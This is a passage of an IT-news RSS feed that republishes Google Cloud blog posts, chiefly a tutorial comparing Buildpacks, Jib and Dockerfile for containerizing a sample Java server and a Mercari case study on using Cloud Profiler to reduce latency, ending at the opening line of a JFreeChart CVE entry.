    <dd>&lt;ListValue: [StructValue([('code', 'import apache_beam as beam\r\nfrom apache_beam.options.pipeline_options import PipelineOptions\r\n\r\noptions = PipelineOptions([\r\n    "--runner=FlinkRunner",\r\n    "--flink_version=1.9",\r\n    "--flink_master=localhost:8081",\r\n    "--environment_type=DOCKER"\r\n])\r\nwith beam.Pipeline(options=options) as p:\r\n    ...'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa837760&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>After you’ve written your Python job, simply run it to submit:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '$ python wordcount.py'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa8377c0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p><a href="https://cloud.google.com/dataproc">Learn more about Dataproc.</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Buildpacks vs Jib vs Dockerfile: Comparing containerization methods]]></title>
<description><![CDATA[As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of ...]]></description>
<link>https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of the compiled Java classes and would run inside of a "container" running on the JVM. As long as your class files were compatible with the JVM and container, the app would just work.</p><p>That all worked great until people started building non-JVM stuff: Ruby, Python, NodeJS, Go, etc. Now we needed another way to package up apps so they could be run on production systems. To do this we needed some kind of virtualization layer that would allow anything to be run. Heroku was one of the first to tackle this and they used a Linux virtualization system called "lxc" - short for Linux Containers. Running a "container" on lxc was half of the puzzle because still a "container" needed to be created from source code, so Heroku invented what they called "Buildpacks" to create a standard way to convert source into a container.</p><p>A bit later a Heroku competitor named dotCloud was trying to tackle similar problems and went a different route which ultimately led to Docker, a standard way to create and run containers across platforms including Windows, Mac, Linux, Kubernetes, and Google Cloud Run. Ultimately the container specification behind Docker became a standard under the <a href="https://opencontainers.org/" target="_blank">Open Container Initiative (OCI)</a> and the virtualization layer switched from lxc to <a href="https://github.com/opencontainers/runc" target="_blank">runc</a> (also an OCI project).</p><p>The traditional way to build a Docker container is built into the <code>docker</code> tool and uses a sequence of special instructions usually in a file named <code>Dockerfile</code> to compile the source code and assemble the "layers" of a container image.</p><p>Yeah, this is confusing because we have all sorts of different "containers" and ways to run stuff in those containers. And there are also many ways to create the things that run in containers. The bit of history is important because it helps us categorize all of this into three parts:</p><ul><li>Container Builders - Turn source code into a Container Image</li><li>Container Images - Archive files containing a "runnable" application</li><li>Containers - Run Container Images</li></ul><p>With Java EE those three categories map to technologies like:</p><ul><li>Container Builders == Ant or Maven</li><li>Container Images == .jar, .war, or .ear</li><li>Containers == JBoss, WebSphere, WebLogic</li></ul><p>With Docker / OCI those three categories map to technologies like:</p><ul><li>Container Builders == Dockerfile, Buildpacks, or Jib</li><li>Container Images == .tar files usually not dealt with directly but through a "container registry"</li><li>Containers == Docker, Kubernetes, Cloud Run</li></ul><h3>Java Sample Application</h3>Let's explore the Container Builder options further on a little Java server application.  If you want to follow along, clone my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a>:<p><code>git clone https://github.com/jamesward/comparing-docker-methods.git</code><br></p><p><code>cd comparing-docker-methods</code></p><p></p><p>In that project you'll see a basic Java web server in <code>src/main/java/com/google/WebApp.java</code> that just responds with "hello, world" on a GET request to <code>/</code>. Here is the source:<br></p><p></p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'package com.google;\r\n\r\nimport com.sun.net.httpserver.HttpServer;\r\nimport java.io.IOException;\r\nimport java.io.OutputStream;\r\nimport java.net.InetSocketAddress;\r\n\r\npublic class WebApp {\r\n\r\n  public static void main(String[] args) throws IOException {\r\n    int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));\r\n    HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);\r\n\r\n    server.createContext("/", handler -&gt; {\r\n      byte[] response = "hello, world".getBytes();\r\n      handler.sendResponseHeaders(200, response.length);\r\n      try (OutputStream os = handler.getResponseBody()) {\r\n        os.write(response);\r\n      }\r\n    });\r\n\r\n    System.out.println("Listening at http://localhost:" + port);\r\n\r\n    server.start();\r\n  }\r\n}'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860670&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>This project uses Maven with a minimal <code>pom.xml</code> build config file for compiling and running the Java server:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;?xml version="1.0" encoding="UTF-8"?&gt;\r\n&lt;project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\r\n    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"&gt;\r\n  &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;\r\n\r\n  &lt;groupId&gt;com.google&lt;/groupId&gt;\r\n  &lt;artifactId&gt;sample-java-mvn&lt;/artifactId&gt;\r\n  &lt;packaging&gt;jar&lt;/packaging&gt;\r\n  &lt;version&gt;0.1.0-SNAPSHOT&lt;/version&gt;\r\n\r\n  &lt;properties&gt;\r\n    &lt;maven.compiler.source&gt;8&lt;/maven.compiler.source&gt;\r\n    &lt;maven.compiler.target&gt;8&lt;/maven.compiler.target&gt;\r\n  &lt;/properties&gt;\r\n\r\n  &lt;build&gt;\r\n    &lt;plugins&gt;\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;\r\n        &lt;artifactId&gt;exec-maven-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;1.6.0&lt;/version&gt;\r\n        &lt;executions&gt;\r\n          &lt;execution&gt;\r\n            &lt;goals&gt;\r\n              &lt;goal&gt;java&lt;/goal&gt;\r\n            &lt;/goals&gt;\r\n          &lt;/execution&gt;\r\n        &lt;/executions&gt;\r\n        &lt;configuration&gt;\r\n          &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;\r\n        &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;3.2.0&lt;/version&gt;\r\n        &lt;configuration&gt;\r\n          &lt;archive&gt;\r\n            &lt;manifest&gt;\r\n              &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n            &lt;/manifest&gt;\r\n          &lt;/archive&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n    &lt;/plugins&gt;\r\n  &lt;/build&gt;\r\n\r\n&lt;/project&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860c10&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to run this locally make sure you have Java 8 installed and from the project root directory, run:</p><p><code>./mvnw compile exec:java</code></p><p>You can test the server by visiting: <a href="http://localhost:8080/" target="_blank">http://localhost:8080</a></p><h3>Container Builder: Buildpacks</h3><p>We have an application that we can run locally so let's get back to those Container Builders. Earlier you learned that Heroku invented Buildpacks to create standard, polyglot ways to go from source to a Container Image. When Docker / OCI Containers started gaining popularity Heroku and Pivotal worked together to make their Buildpacks work with Docker / OCI Containers. That work is now a sandbox Cloud Native Computing Foundation project: <a href="https://buildpacks.io/" target="_blank">https://buildpacks.io/</a></p><p>To use Buildpacks you will need to <a href="https://docs.docker.com/get-started/" target="_blank">install Docker</a> and <a href="https://github.com/buildpacks/pack/releases" target="_blank">the pack tool</a>. Now from the command line tell Buildpacks to take your source and turn it into a Container Image:</p><p><code>pack build --builder=gcr.io/buildpacks/builder:v1 comparing-docker-methods:buildpacks</code></p><p>Magic! You didn't have to do anything and the Buildpacks knew how to turn that Java application into a Container Image. It even works on Go, NodeJS, Python, and .Net apps out-of-the-box. So what just happened?  Buildpacks inspect your source and try to identify it as something it knows how to build. In the case of our sample application it noticed the <code>pom.xml</code> file and decided it knows how to build Maven-based applications. The <code>--builder</code> flag told it where to get the Buildpacks from. In this case, <code>gcr.io/buildpacks/builder:v1</code> are the Container Image coordinates to <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks">Google Cloud's Buildpacks</a>. Alternatively you could use the Heroku or Paketo Buildpacks. The parameter <code>comparing-docker-methods:buildpacks</code> is the Container Image coordinates for where to store the output. In this case it stores on the local docker daemon. You can now run that Container Image locally with <code>docker</code>:</p><p><code>docker run -it -ePORT=8080 -p8080:8080 comparing-docker-methods:buildpacks</code></p><p>Of course you can also run that Container Image anywhere that runs Docker / OCI Containers like Kubernetes and Cloud Run.</p><p>Buildpacks are nice because in many cases they just work and you don't have to do anything special to turn your source into something runnable. But the resulting Container Images created from Buildpacks can be a bit bulky. Let's use a tool called <a href="https://github.com/wagoodman/dive" target="_blank"><code>dive</code></a> to examine what is in the created container image:</p><p><code>dive comparing-docker-methods:buildpacks</code></p><p></p><p></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_comparison.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Here you can see the Container Image has 11 layers and a total image size of 319MB. With <code>dive</code> you can explore each layer and see what was changed. In this Container Image the first 6 layers are the base operating system. Layer 7 is the JVM and layer 8 is our compiled application. Layering enables great caching so if only layer 8 changes, then layers 1 through 7 do not need to be re-downloaded. One downside of Buildpacks is how (at least for now) all of the dependencies and compiled application code are stored in a single layer. It would be better to have separate layers for the dependencies and the compiled application.</p><p>To recap, Buildpacks are the easy option that "just works" right out-of-the-box. But the Container Images are a bit large and not optimally layered.</p><h3>Container Builder: Jib</h3><p>The open source <a href="https://github.com/GoogleContainerTools/jib" target="_blank">Jib project</a> is a Java library for creating Container Images with Maven and Gradle plugins. To use it on a Maven project (like the one we from above), just add a build plugin to the <code>pom.xml</code> file:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;plugin&gt;\r\n    &lt;groupId&gt;com.google.cloud.tools&lt;/groupId&gt;\r\n    &lt;artifactId&gt;jib-maven-plugin&lt;/artifactId&gt;\r\n    &lt;version&gt;2.6.0&lt;/version&gt;\r\n&lt;/plugin&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d30&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Now a Container Image can be created and stored in the local docker daemon by running:</p><p><code>./mvnw compile jib:dockerBuild -Dimage=comparing-docker-methods:jib</code></p><p>Using <code>dive</code> we will see that the Container Image for this application is now only 127MB thanks to slimmer operating system and JVM layers. Also, on a Spring Boot application we can see how Jib layers the dependencies, resources, and compiled application for better caching:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Spring_Boot_Application.max-1000x1000.png" alt="Spring Boot Application">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>In this example the 18MB layer contains the runtime dependencies and the final layer contains the compiled application. Unlike with Buildpacks the original source code is not included in the Container Image. Jib also has a great feature where you can use it without docker being installed, as long as you store the Container Image on an external Container Registry (like DockerHub or the Google Cloud Container Registry). Jib is a great option with Maven and Gradle builds for Container Images that use the JVM.</p><h3>Container Builder: Dockerfile</h3><p>The traditional way to create Container Images is built into the <code>docker</code> tool and uses a sequence of instructions defined in a file usually named <code>Dockerfile</code>. Here is a <code>Dockerfile</code> you can use with the sample Java application:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM adoptopenjdk/openjdk8 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nFROM adoptopenjdk/openjdk8:jre\r\n\r\nCOPY --from=builder /app/target/*.jar /server.jar\r\n\r\nCMD ["java", "-jar", "/server.jar"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d90&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>In this example, the first four instructions start with the AdoptOpenJDK 8 Container Image and build the source to a Jar file. The final Container Image is created from the AdoptOpenJDK 8 JRE Container Image and includes the created Jar file. You can run <code>docker</code> to create the Container Image using the <code>Dockerfile</code> instructions:</p><p><code>docker build -t comparing-docker-methods:dockerfile </code></p><p>Using <code>dive</code> we can see a pretty slim Container Image at 209MB:<br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Container_image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>With a <code>Dockerfile</code> we have full control over the layering and base images. For example, we could use the <a href="https://github.com/GoogleContainerTools/distroless/tree/master/java" target="_blank">Distroless Java base image</a> to trim down the Container Image even further. This method of creating Container Images provides a lot of flexibility but we do have to write and maintain the instructions.</p><p>With this flexibility we can do some cool stuff. For example, we can use GraalVM to create a "native image" of our application. This is an ahead-of-time compiled binary which can reduce startup time, reduce memory usage, and alleviate the need for a JVM in the Container Image. And we can go even further and create a statically linked native image which includes everything needed to run so that even an operating system is not needed in the Container Image. Here is the Dockerfile to do that:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM oracle/graalvm-ce:20.2.0-java11 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN gu install native-image\r\n\r\n# BEGIN PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n# SEE: https://github.com/oracle/graal/blob/master/substratevm/StaticImages.md\r\nARG RESULT_LIB="/staticlibs"\r\n\r\nRUN mkdir ${RESULT_LIB} &amp;&amp; \\\r\n    curl -L -o musl.tar.gz https://musl.libc.org/releases/musl-1.2.1.tar.gz &amp;&amp; \\\r\n    mkdir musl &amp;&amp; tar -xvzf musl.tar.gz -C musl --strip-components 1 &amp;&amp; cd musl &amp;&amp; \\\r\n    ./configure --disable-shared --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /muscl &amp;&amp; rm -f /musl.tar.gz &amp;&amp; \\\r\n    cp /usr/lib/gcc/x86_64-redhat-linux/4.8.2/libstdc++.a ${RESULT_LIB}/lib/\r\n\r\nENV PATH="$PATH:${RESULT_LIB}/bin"\r\nENV CC="musl-gcc"\r\n\r\nRUN curl -L -o zlib.tar.gz https://zlib.net/zlib-1.2.11.tar.gz &amp;&amp; \\\r\n   mkdir zlib &amp;&amp; tar -xvzf zlib.tar.gz -C zlib --strip-components 1 &amp;&amp; cd zlib &amp;&amp; \\\r\n   ./configure --static --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /zlib &amp;&amp; rm -f /zlib.tar.gz\r\n#END PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nRUN native-image \\\r\n  --static \\\r\n  --libc=musl \\\r\n  --no-fallback \\\r\n  --no-server \\\r\n  --install-exit-handlers \\\r\n  -H:Name=webapp \\\r\n  -cp /app/target/*.jar \\\r\n  com.google.WebApp\r\n\r\nFROM scratch\r\n\r\nCOPY --from=builder /app/webapp /webapp\r\n\r\nENTRYPOINT ["/webapp"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860df0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will see there is a bit of setup needed to support static native images. After that setup the Jar is compiled like before with Maven. Then the <code>native-image</code> tool creates the binary from the Jar. The <code>FROM scratch</code> instruction means the final container image will start with an empty one. The statically linked binary created by <code>native-image</code> is then copied into the empty container.</p><p>Like before you can use <code>docker</code> to build the Container Image:</p><p><code>docker build -t comparing-docker-methods:graalvm .</code></p><p>Using <code>dive</code> we can see the final Container Image is only 11MB!</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_Image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>And it starts up super fast because we don't need the JVM, OS, etc. Of course GraalVM is not always a great option as there are some challenges like dealing with reflection and debugging. You can read more about this in my blog, <a href="https://jamesward.com/2020/05/07/graalvm-native-image-tips-tricks/" target="_blank">GraalVM Native Image Tips &amp; Tricks</a>.</p><p>This example does capture the flexibility of the <code>Dockerfile</code> method and the ability to do anything you need. It is a great escape hatch when you need one.</p><h3>Which Method Should You Choose?</h3><p></p><ul><li>The easiest, polyglot method: Buildpacks</li><li>Great layering for JVM apps: Jib</li><li>The escape hatch for when those methods don't fit: Dockerfile</li></ul><p></p><p>Check out my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a> to explore these methods as well as the mentioned Spring Boot + Jib example.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Announcing Google Cloud buildpacks—container images made easy</h4>
            <p class="uni-related-article-tout__body">Google Cloud buildpacks make it much easier and faster to build applications on top of containers.</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Mercari reduced request latency by 15% with Cloud Profiler]]></title>
<description><![CDATA[Editor’s note: For retailers, predicting consumers’ desires and demand is the holy grail. For retail IT, the goal is understanding the performance of your ecommerce applications. Here, Japanese online retailer Mercari shows how they used Cloud Profiler and Trace to understand a complex microservi...]]></description>
<link>https://tsecurity.de/de/3662835/it-security-nachrichten/how-mercari-reduced-request-latency-by-15-with-cloud-profiler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662835/it-security-nachrichten/how-mercari-reduced-request-latency-by-15-with-cloud-profiler/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p><i><b>Editor’s note</b>: For retailers, predicting consumers’ desires and demand is the holy grail. For retail IT, the goal is understanding the performance of your ecommerce applications. Here, Japanese online retailer Mercari shows how they used Cloud Profiler and Trace to understand a complex microservices-based application running on Google Cloud, to meet rigorous SLOs as demand shifts for their products. </i></p><p>The events of 2020 have accelerated ecommerce, increasing demand for and traffic on online marketplaces. Analyst eMarketer <a href="https://www.emarketer.com/content/us-ecommerce-will-rise-18-2020-amid-pandemic?ecid=NL1001" target="_blank">predicts</a> that ecommerce sales in the United States will grow 18% in 2020, against an overall fall in total retail sales of 10.5% for the year. Likewise, our business—Japan-headquartered consumer-to-consumer marketplace <a href="https://www.mercari.com/us/help_center/article/22" target="_blank">Mercari Inc</a>—is growing rapidly. In the United States alone, we have seen 74% year-on-year growth in monthly average users to 3.4 million. A big part of our success are our robust payment and deposit systems and AI-based fraud monitoring, which enable sellers to list items for purchase and buyers to complete transactions safely. </p><p>Mercari started as a monolithic application but as complexity grew we decided to transition to a microservices architecture. And through it all, tools like Cloud Profiler and Cloud Trace helped us track down performance problems in our code, significantly improving latency.</p><h3>A microservices menagerie</h3><p>Today, we run 80+ microservices on Google Cloud with a mix of languages including Go, Python, JavaScript and Java. To deliver this new architecture, we created a gateway-like microservice to route traffic from soon-to-be migrated monolithic service to the Google Cloud microservices, which  delivers a range of features. </p><p>After creating several microservices, we identified common requirements and created a template to accelerate their development. These common requirements included: </p><ul><li><p>Exporting metrics to Prometheus</p></li><li><p>A gRPC server and interceptors</p></li><li><p>Error Reporting, Cloud Trace and Cloud Profiler. Error Reporting counts, analyzes and aggregates crashes in running cloud services, while Cloud Trace provides a view of requests as they flow through microservices and Cloud Profiler shows how microservices consume CPU, memory and threads.  </p></li></ul><p>We then used Python to create a template for machine learning services, also expediting the creation of new microservices. This has enabled us to grow the number of microservices we use in order to address new requirements. However, as our microservices proliferated, we needed to efficiently monitor and understand their performance. </p><h3>Maintaining SLO a challenge</h3><p>In particular, we needed to monitor the impact of new versions on the production environment and the efficiency of production operations, so we could maintain our service level objective (SLO) for success rates of 99.95% and 350 milliseconds for 95% latency. </p><p>Our engineering team also uses canary deployments to detect issues with new versions of major services. However, despite applying these measures, we found it challenging to maintain our SLO when our business grew faster than expected or during unanticipated spikes in demand. Some issues can be obvious or easy to detect. For example, if a service is experiencing high CPU utilization, we could simply place or fine tune our horizontal pod autoscaler (HPA) to resolve the problem. However, other issues may be less obvious. For example, a drop in performance may not directly be tied to a specific release—it may instead be due to unexpected requests, or may arise from changes to multiple functions in a single code release. </p><h3>Using Cloud Profiler and Cloud Trace to minimize performance issues</h3><p>In particular, our business-critical UserStats service, which tracks the speed with which a user replies to a message and how fast and reliably a seller ships an item, recently started performing poorly. </p><p>New feature requirements had prompted us to track how often a seller cancels an order and provide statistics. However, while adding this new functionality, the change refactored other functions, meaning we were unable to identify the function experiencing reduced performance. Since most of our services are enabled with Cloud Profiler and Cloud Trace, we turned to these products to investigate and identify the root cause.  </p><p>Before the change:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace.max-1000x1000.jpg" alt="Using Cloud Profiler and Cloud Trace.jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>After the change:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace_2_1.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace_2_1.max-1000x1000.jpg" alt="Using Cloud Profiler and Cloud Trace 2 (1).jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>These two Cloud Profiler views show the CPU time of the call stack increased from 457 milliseconds to 904 milliseconds, with most of the delta attributable to the <b>_UserStats_SellerCancelStats_Handler</b> function. But because other functions also saw variations in their CPU consumption, and because calls occurred in parallel, we found it difficult to identify the cause of latency increases. The fact that this function call was necessary meant we could not remove the entire function. </p><p>We checked Cloud Trace and confirmed the function call had increased overall latency on some requests, similar to below:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/trace_waterfall_view.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/trace_waterfall_view.max-1000x1000.jpg" alt="trace waterfall view.jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>We analyzed the service with Cloud Profiler and identified hot spots that were contributing to the increase in CPU time consumption. We optimized these hot functions, deployed the new code, used Cloud Profiler to verify that the changes had the desired effect of reducing the CPU time. Doing so, we were able to improve latency by 10% to 15%!</p><h3>Simplifying the DevOps experience</h3><p>Before adopting Cloud Profiler, profiling production services was a tedious and manual undertaking involving recompiling with debug flags; deployment to production environments, and using disparate  tools to collect profiles and perform analysis. Containerization only increased this complexity, further reducing developer productivity. </p><p>Cloud Profiler enables us to continuously profile production environments with small and simple code changes, replacing the tedious work previously required to set up environments for performance analysis. <a href="https://cloud.google.com/profiler/docs/about-profiler#performance_impact">Low overhead</a> continuous profiling with Cloud Profiler helps us react swiftly to changes in service performance by root causing and resolving issues quickly.</p><p>Further, tools such as Cloud Trace and Cloud Profiler require minimal effort to setup and provide a consistent DevOps experience for our service owners. This is particularly important as we grow in the United States and elsewhere. Without Google Cloud, monitoring, debugging and profiling across production environments that feature a mix of languages, technology stacks, frameworks and containers would be extremely challenging and time-consuming. The release of new features and experiences in tools such as Cloud Profiler make us glad we chose Google Cloud as our primary cloud platform. We will continue to work with new features and provide feedback to Google Cloud, so it can continue to provide a better service to users.  </p><p><i>Visit the Google Cloud website to learn more about <a href="https://cloud.google.com/profiler">Cloud Profiler</a> and <a href="https://cloud.google.com/trace">Cloud Trace</a>.</i></p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/topics/customers/mercari-relies-on-google-cloud-premium-support-and-technical-account-management/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Mercari: Faster and more efficient development with the help of Google Cloud</h4>
            <p class="uni-related-article-tout__body">Technical implementation can be challenging, and many businesses can benefit from hands-on support from their cloud provider. Learn how w...</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23077 | JFreeChart 1.5.4 CompassPlot.java memory corruption]]></title>
<description><![CDATA[A vulnerability was found in JFreeChart 1.5.4. It has been rated as critical. Affected is an unknown function of the file /chart/plot/CompassPlot.java. This manipulation causes memory corruption.

